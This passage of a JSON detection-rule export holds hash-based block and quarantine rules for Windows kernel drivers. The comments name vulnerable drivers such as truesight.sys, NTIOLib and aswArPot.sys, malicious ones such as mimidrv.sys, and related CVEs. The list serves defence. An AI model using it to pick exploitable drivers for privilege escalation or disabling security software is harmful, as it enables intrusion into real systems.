+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826188Z",
+ "creation_date": "2026-03-23T11:45:30.826190Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21c51f1f1c7de816763f1c95757815bd9fc4b0c4ddb48b31ba1fb6f75c49734f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23bb2d82-3dac-57b0-9683-c5c5b7eb64b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976353Z",
+ "creation_date": "2026-03-23T11:45:29.976355Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23bfd105-acdd-5028-95b9-6dd26ee6eb9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480028Z",
+ "creation_date": "2026-03-23T11:45:30.480030Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c53b5f071de2bbc03387451052ab81bae9b8ec0a6e075c970600f791157b0b25",
+ "comment": "Vulnerable Kernel Driver (aka gpcidrv64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23c2a3eb-c7fb-5c68-948d-79d2092bfaff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835145Z",
+ "creation_date": "2026-03-23T11:45:30.835148Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6cde9ccc57c594d23b20847c2ad76611a74ef7c682f28dcd20272b1ce802a1e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23d66f56-4796-557f-ac04-d52082a8c83a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615238Z",
+ "creation_date": "2026-03-23T11:45:29.615240Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615245Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7af3585ca7c2dd65032fa48759a0124db2c5bbca5fc8caf8bb8f61fa5085149d",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23e2fbf1-51fc-5f47-a686-b1fe34e654e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816728Z",
+ "creation_date": "2026-03-23T11:45:31.816730Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816739Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05f6a7781481eb0ab9b893a1d5090ac23cb4738b449902f1f65467a560c0eafa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23f3cac5-909c-5d10-a408-709b4fade607",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977392Z",
+ "creation_date": "2026-03-23T11:45:29.977394Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977400Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7079033659ac9459b3b7ab2510805832db2e2a70fe9beb1a6e13c1f51890d88",
+ "comment": "Vulnerable Kernel Driver (aka ProtectS.sys) [https://www.loldrivers.io/drivers/99668140-a8f6-48f8-86d1-cf3bf693600c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23f5fea7-cb0c-5db5-91ea-a91eeb5c57d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967049Z",
+ "creation_date": "2026-03-23T11:45:29.967068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d166b6ffd164dbea53f0f588a979f4c5f1f2a1793fc10cda84a4530b7b22fd0c",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23f67de7-eb03-5fe7-a246-3f38dc0d7f65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156231Z",
+ "creation_date": "2026-03-23T11:45:31.156233Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156242Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bafb67136ec3e5cb200f3ffe103b736f75995a2f6b87b384aa9dfa3501d9ec08",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23fd0a5d-eb2d-56e1-9939-6afff5cf468d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469457Z",
+ "creation_date": "2026-03-23T11:45:30.469460Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469469Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2bff494de18fb32985901a06a931dab92eda052172cf7c942cdd6da944b7a4ba",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "240f7d32-baa7-5bb5-afec-7d3a5ccf266f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474914Z",
+ "creation_date": "2026-03-23T11:45:31.474920Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474932Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35a8ceb54744e733a31b662d964f5cab22ea63ce77286ce141f9c2563bcf1209",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24104255-627b-5f13-9530-5fd8719b5a3c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152159Z",
+ "creation_date": "2026-03-23T11:45:31.152162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152170Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22c56a56f07d687685a3072c12dacccb3dad0c61c6148ce328727dd28f6da58c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "242517f2-7f2e-5810-831a-b960d4218d1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459893Z",
+ "creation_date": "2026-03-23T11:45:30.459897Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459906Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07c0239c548fdabcb18ac3b54001edd0f8abffd8285e39662d7632a26456d58b",
+ "comment": "Vulnerable Kernel Driver (aka VBoxMouseNT.sys) [https://www.loldrivers.io/drivers/ecabc507-2cc7-4011-89ab-7d9d659e6f88/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24274ad6-70fd-5107-afee-8170fe3395cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615932Z",
+ "creation_date": "2026-03-23T11:45:29.615934Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615940Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0fc1c1c1ff39ea9a695996482ab31cb65c74aaf9f20cba21e9ff34ef054a008",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "242e4963-cde5-5fe9-be28-17e303346cf1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983456Z",
+ "creation_date": "2026-03-23T11:45:29.983458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88",
+ "comment": "Vulnerable Kernel Driver (aka t.sys) [https://www.loldrivers.io/drivers/65660363-0080-4432-abd9-64368dac0283/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "244668f1-96aa-513e-a858-ca3e60ae86c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980220Z",
+ "creation_date": "2026-03-23T11:45:29.980222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fa120bda98633e30480d8475c9ac6637470c4ca7c63763560bf869138091b01",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2457a838-4956-519b-aef5-48d77aafa717",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826525Z",
+ "creation_date": "2026-03-23T11:45:31.826527Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6c578ca720621ec6981160912e70e13a390f349d593135587fef9cfc34517ad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "245864bd-b5e7-5dd2-8dad-ac3870829711",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495097Z",
+ "creation_date": "2026-03-23T11:45:31.495099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5888073352e24be4718b0f28b1a4fde32ec3c0ff29bbda20213043bb4a3c6a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "245b7c28-bae4-53a0-845f-0278000edf88",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821290Z",
+ "creation_date": "2026-03-23T11:45:31.821293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821301Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "73f34dad3342777c826f23a3e36384ec093395a9d1d2b28c1bf0a82a9bedd167",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2467e068-43d7-5717-9275-31caf05ba5ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618586Z",
+ "creation_date": "2026-03-23T11:45:29.618588Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618593Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b38c075ba6523502dfd39ed10757db58234a1c84d4952b65e30b4a8679bfcca",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24680372-aa41-510d-9921-25dec8eed65f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970262Z",
+ "creation_date": "2026-03-23T11:45:29.970264Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970269Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fca5f90ce2b210e6026cbf6f2c281fe17a08ddb2e936200847823ef83eaab1eb",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2470a35c-3229-52c2-a468-181abcf1ce3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619303Z",
+ "creation_date": "2026-03-23T11:45:29.619305Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619310Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "248cc669-35e5-5018-95e0-082bfc13355e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831621Z",
+ "creation_date": "2026-03-23T11:45:30.831623Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
